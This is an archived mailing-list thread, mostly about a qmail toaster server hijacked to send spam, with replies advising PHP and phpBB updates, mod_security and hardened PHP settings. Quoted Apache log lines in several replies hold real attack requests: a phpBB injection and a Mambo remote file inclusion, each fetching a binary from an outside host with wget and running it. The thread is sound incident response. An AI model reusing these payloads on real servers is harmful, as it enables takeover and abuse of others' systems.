Re: [toaster] chkuser
tonix (Antonio Nati) wrote: At 05.14 09/02/2006, you wrote: Is there a way to close a connection after 3 or 4 invalid mailboxes are reached on a single connection? When spammers hit my production server I see multiple emails in the log account that if they could be blocked after 3 or 4 invalid address are reached. It's all already inside the box. Check carefully toaster documentation or look in http://www.interazioni.it/opensource/chkuser/documentation/chkuser_settings.html#Tarpitting for more info on chkuser settings. Ciao, Tonino Thanks Dennis According to your documents all I should have to do is change out the CHKUSER_WRONGRCPTLIMIT to lets say 4 then recompile? #define CHKUSER_WRONGRCPT_LIMIT_VARIABLE CHKUSER_WRONGRCPTLIMIT This is the definition of the variable; you have to recompile and install after this change. Then, you must declare (in tcp.smtp or in the running script) the variable CHKUSER_WRONGRCPTLIMIT with the value you want (zero means infinite). Ciao, Tonino Dennis -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- La tua posta elettronica senza virus su UfficioPostale.IT Your virus free electronic mail on UfficioPostale.IT
[toaster] Toaster compromised? Or system?
*warning long email* Hi all, We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how/how to prevent this... My server is a Sempron 2800+ / 1GB RAM running Redhat 9 and toaster version .61 (not the latest I know, but I haven't been able to update it that often) I say compromised because I came in in the morning and found 40-something thousand mails in the queue. We never see more than a few hundred. It had filled up the disk, and I noticed that they were all mails to hotmail/yahoo/etc addresses. Bad news. So I started looking around, I started to suspect that this was some sort of apache / php exploit, and I noticed the following output of a ps -ef f: [EMAIL PROTECTED] ps -ef f UIDPID PPID C STIME TTY STAT TIME CMD snip root 3761 1 0 Jan19 ?S 0:00 /bin/sh /command/svscanboot root 3768 3761 0 Jan19 ?S 0:49 \_ svscan /service root 3770 3768 0 Jan19 ?S 0:00 | \_ supervise qmail-send qmails3792 3770 0 Jan19 ?S 3:13 | | \_ qmail-send root 3795 3792 0 Jan19 ?S 0:05 | | \_ qmail-lspawn qmailr3796 3792 0 Jan19 ?S 0:20 | | \_ qmail-rspawn qmailr5716 3796 0 13:16 ?S 0:00 | | | \_ qmail-rem qmailr5719 3796 0 13:16 ?S 0:00 | | | \_ qmail-rem qmailr5735 3796 0 13:16 ?S 0:00 | | | \_ qmail-rem qmailr5757 3796 0 13:16 ?S 0:00 | | | \_ qmail-rem qmailr5910 3796 0 13:17 ?S 0:00 | | | \_ qmail-rem qmailr5951 3796 0 13:17 ?S 0:00 | | | \_ qmail-rem qmailr6149 3796 0 13:18 ?S 0:00 | | | \_ qmail-rem qmailr6233 3796 0 13:18 ?S 0:00 | | | \_ qmail-rem qmailr6299 3796 0 13:18 ?S 0:00 | | | \_ qmail-rem qmailr6388 3796 0 13:19 ?S 0:00 | | | \_ qmail-rem qmailr6430 3796 0 13:19 ?S 0:00 | | | \_ qmail-rem qmailr6560 3796 0 13:19 ?S 0:00 | | | \_ qmail-rem qmailr6715 3796 0 13:20 ?S 0:00 | | | \_ qmail-rem qmailr6846 3796 0 13:20 ?S 0:00 | | | \_ qmail-rem qmailr6852 3796 0 13:20 ?S 0:00 | | | \_ qmail-rem qmailr7133 3796 0 13:21 ?S 0:00 | | | \_ qmail-rem qmailr7541 3796 0 13:23 ?S 0:00 | | | \_ qmail-rem qmailr7563 3796 0 13:23 ?S 0:00 | | | \_ qmail-rem qmailr7600 3796 0 13:23 ?S 0:00 | | | \_ qmail-rem qmailr7614 3796 0 13:23 ?S 0:00 | | | \_ qmail-rem qmailr7625 3796 0 13:23 ?S 0:00 | | | \_ qmail-rem qmailr8169 3796 0 13:25 ?S 0:00 | | | \_ qmail-rem qmailr8319 3796 0 13:26 ?S 0:00 | | | \_ qmail-rem qmailr8446 3796 0 13:26 ?S 0:00 | | | \_ qmail-rem qmailr8569 3796 0 13:27 ?S 0:00 | | | \_ qmail-rem qmailr8681 3796 0 13:27 ?S 0:00 | | | \_ qmail-rem qmailr9214 3796 0 13:27 ?S 0:00 | | | \_ qmail-rem qmailr 10366 3796 0 13:28 ?S 0:00 | | | \_ qmail-rem qmailr 10564 3796 0 13:29 ?S 0:00 | | | \_ qmail-rem qmailr 10760 3796 0 13:29 ?S 0:00 | | | \_ qmail-rem qmailr 10871 3796 0 13:29 ?S 0:00 | | | \_ qmail-rem qmailr 11544 3796 0 13:30 ?S 0:00 | | | \_ qmail-rem qmailr 11731 3796 0 13:31 ?S 0:00 | | | \_ qmail-rem qmailr 12238 3796 0 13:31 ?S 0:00 | | | \_ qmail-rem qmailr 12402 3796 0 13:31 ?S 0:00 | | | \_ qmail-rem qmailr 13074 3796 0 13:32 ?S 0:00 | | | \_ qmail-rem qmailr 13280 3796 0 13:32 ?S 0:00 | | | \_ qmail-rem qmailr 14385 3796 0 13:34 ?S 0:00 | | | \_ qmail-rem qmailr 14413 3796 0 13:34 ?S 0:00 | | | \_ qmail-rem qmailr 14576 3796 0 13:34 ?S 0:00 | | | \_ qmail-rem qmailr 15075 3796 0 13:35 ?S 0:00 | | | \_ qmail-rem qmailr 15081 3796 0 13:35 ?S 0:00 | | | \_ qmail-rem qmailr 15705 3796 0 13:35 ?S 0:00 | | | \_ qmail-rem qmailr 15933 3796 0 13:35 ?
Re: [toaster] Toaster compromised? Or system?
David wrote: *warning long email* Hi all, We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how/how to prevent this... apache 32499 32498 0 Feb08 ?S 0:00 \_ perl /tmp/dc.txt 67.159.2 apache 32503 32499 0 Feb08 ?S 0:00 \_ /bin/bash Hi, I believe that is the xmlprc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it. You can then use a tool like qmail-remove to clean out the queue. Regards, Rick
Re: [toaster] Toaster compromised? Or system?
Rick Macdougall wrote: David wrote: *warning long email* Hi all, We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how/how to prevent this... apache 32499 32498 0 Feb08 ?S 0:00 \_ perl /tmp/dc.txt 67.159.2 apache 32503 32499 0 Feb08 ?S 0:00 \_ /bin/bash Hi, I believe that is the xmlprc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it. You can then use a tool like qmail-remove to clean out the queue. Regards, Rick !DSPAM:43ec99dc204751732444004! Thanks Rick, I'm running php 4.3.10 and I can't find any information about a xmlrpc exploit; I also can't find any entries in my logs about dc.txt. I will keep looking. Thanks, David.
Re: [toaster] Toaster compromised? Or system?
Take a look through your Apache logs to see the URL call they used to exploit the /tmp directory. Try searching for strings like: 'wget' or 'ftp' within your apache access logs. Chances are you will uncover the cuplrit script. Judging by the permissions in the files in your /tmp directory they most likely did not get root on the box. In the future I would recommend chmod'ing the following executables to 700: wget ftp lynx If you can get away with chmoding perl to 700 that will help things also. Due to the permission settings on this files, they had to have executed the script with: perl filename.pl Check out mod_security for Apache as well. Peter On 2/10/06, David [EMAIL PROTECTED] wrote: Rick Macdougall wrote: David wrote: *warning long email* Hi all, We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how/how to prevent this... apache 32499 324980 Feb08 ?S0:00\_ perl /tmp/dc.txt 67.159.2 apache 32503 324990 Feb08 ?S0:00\_ /bin/bash Hi, I believe that is the xmlprc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it. You can then use a tool like qmail-remove to clean out the queue. Regards, Rick !DSPAM:43ec99dc204751732444004!Thanks Rick,I'm running php 4.3.10 and I can't find any information about a xmlrpcexploit; I also can't find any entries in my logs about dc.txt. I willkeep looking.Thanks,David.
Re: [toaster] Toaster compromised? Or system?
David wrote: Rick Macdougall wrote: Hi, I believe that is the xmlprc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). I'm running php 4.3.10 and I can't find any information about a xmlrpc exploit; I also can't find any entries in my logs about dc.txt. I will keep looking. http://news.netcraft.com/archives/2005/07/04/php_blogging_apps_vulnerable_to_xmlrpc_exploits.html Regards, Rick
Re: [toaster] Toaster compromised? Or system?
Thanks Peter - reassuring to know that someone else thinks they probably didn't get root... I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however. I uncovered this in the apache logs: ./www.myvirtualhost.domain-access_log:86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] GET /store/phpbb2/viewtopic.php?t=2rush=% 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa% 3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7 3%68%5D%29.%2527 HTTP/1.1 200 21138 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the system weathered that one. Closer to date is: ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters aft er protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http: //209.136.48.69/cmd.gif?cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1 But it looks like that one failed. Oh well time to update php and clean out a few old phpbb installs. Thanks all for your help. David Peter Maag wrote: Take a look through your Apache logs to see the URL call they used to exploit the /tmp directory. Try searching for strings like: 'wget' or 'ftp' within your apache access logs. Chances are you will uncover the cuplrit script. Judging by the permissions in the files in your /tmp directory they most likely did not get root on the box. In the future I would recommend chmod'ing the following executables to 700: wget ftp lynx If you can get away with chmoding perl to 700 that will help things also. Due to the permission settings on this files, they had to have executed the script with: perl filename.pl Check out mod_security for Apache as well. Peter On 2/10/06, *David* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Rick Macdougall wrote: David wrote: *warning long email* Hi all, We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how/how to prevent this... apache 32499 32498 0 Feb08 ?S 0:00 \_ perl /tmp/dc.txt 67.159.2 apache 32503 32499 0 Feb08 ?S 0:00 \_ /bin/bash Hi, I believe that is the xmlprc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it. You can then use a tool like qmail-remove to clean out the queue. Regards, Rick Thanks Rick, I'm running php 4.3.10 and I can't find any information about a xmlrpc exploit; I also can't find any entries in my logs about dc.txt. I will keep looking. Thanks, David. !DSPAM:43ecaff4216508586114564!
Re: [toaster] Qmail can't send receive
Cahyo Purnomo wrote: [EMAIL PROTECTED] root]# tail -f /var/log/qmail/current @400043ec3c0f24382dbc status: local 0/10 remote 0/20 @400043ec3c0f2438358c end msg 117047 @400043ec3c6223f50e24 starting delivery 58: msg 117255 to remote [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] @400043ec3c6223f5314c status: local 0/10 remote 1/20 @400043ec3c77015eb34c delivery 58: deferral: CNAME_lookup_failed_temporarily._(#4.4.3)/ @400043ec3c77015ed28c status: local 0/10 remote 0/20 @400043ec3dd300ca04cc starting delivery 59: msg 117045 to remote [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] @400043ec3dd300ca27f4 status: local 0/10 remote 1/20 @400043ec3de92b1a1884 delivery 59: deferral: Sorry,_I_couldn't_find_any_host_by_that_name._(#4.1.2)/ @400043ec3de92b1a33dc status: local 0/10 remote 0/20 Looks like DNS is not working. That will stop mail for sure. Regards, Bill
Re: [toaster] Toaster compromised? Or system?
I would personally setup mod_security as well. It should stop most of these types of attacks right away with default settings. Peter On 2/10/06, David [EMAIL PROTECTED] wrote: Bill Shupp wrote: David wrote: Thanks Peter - reassuring to know that someone else thinks they probably didn't get root... I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however. I uncovered this in the apache logs: ./www.myvirtualhost.domain-access_log:86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] GET /store/phpbb2/viewtopic.php?t=2rush=% 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa% 3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7 3%68%5D%29.%2527 HTTP/1.1 200 21138 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the system weathered that one. Closer to date is: ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters aft er protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http: //209.136.48.69/cmd.gif?cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1 But it looks like that one failed. Oh well time to update php and clean out a few old phpbb installs. Thanks all for your help. David A few things I always run into with PHP that are popular: 1) Make sure PHPBB is the latest version and not exploitable.I used to allow my clients to install it, but every few months, SOMEONE would install an old exploitable version.I've switched to using debian's PHPBB package, and just point clients to it so I don't have to keep track of it anymore.I just run security updates daily instead on all packages.Haven't been exploited since. 2) Keep register_globals off, and only turn it on as needed. 3) Make sure allow_url_fopen is set to OFF.This is a very popular one, and in my experience tends to attract DDoS attackes rather than a mail exploit.But costs you expensive bandwitdth nonetheless. Regards, Bill !DSPAM:43ecbcde224031625613092!Cheers Bill, register_globals always off, but now I will probably disable url file operations too. Perhaps just enable them on a per-sitesettingDavid
Re: [toaster] Toaster compromised? Or system?
and for increase security I would recommend that you set this php variables in your apache virtual host entry:php_admin_value open_basedir /path/to/domain/dir/htdocs:/path/to/other/include/dirs php_admin_value upload_tmp_dir /path/to/domain/dir/htdocs/phpuploadtmpdirThis will only allow php to open files in those directory only. If you will allow to upload files, then you should change the upload temp path to be inside one of the open_basedir directories. --Jose Canciani.On 2/10/06, Peter Maag [EMAIL PROTECTED] wrote: I would personally setup mod_security as well. It should stop most of these types of attacks right away with default settings. Peter On 2/10/06, David [EMAIL PROTECTED] wrote: Bill Shupp wrote: David wrote: Thanks Peter - reassuring to know that someone else thinks they probably didn't get root... I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however. I uncovered this in the apache logs: ./www.myvirtualhost.domain-access_log: 86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] GET /store/phpbb2/viewtopic.php?t=2rush=% 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa% 3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7 3%68%5D%29.%2527 HTTP/1.1 200 21138 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the system weathered that one. Closer to date is: ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters aft er protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http: //209.136.48.69/cmd.gif?cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1 But it looks like that one failed. Oh well time to update php and clean out a few old phpbb installs. Thanks all for your help. David A few things I always run into with PHP that are popular: 1) Make sure PHPBB is the latest version and not exploitable.I used to allow my clients to install it, but every few months, SOMEONE would install an old exploitable version.I've switched to using debian's PHPBB package, and just point clients to it so I don't have to keep track of it anymore.I just run security updates daily instead on all packages.Haven't been exploited since. 2) Keep register_globals off, and only turn it on as needed. 3) Make sure allow_url_fopen is set to OFF.This is a very popular one, and in my experience tends to attract DDoS attackes rather than a mail exploit.But costs you expensive bandwitdth nonetheless. Regards, Bill !DSPAM:43ecbcde224031625613092!Cheers Bill, register_globals always off, but now I will probably disable url file operations too. Perhaps just enable them on a per-sitesettingDavid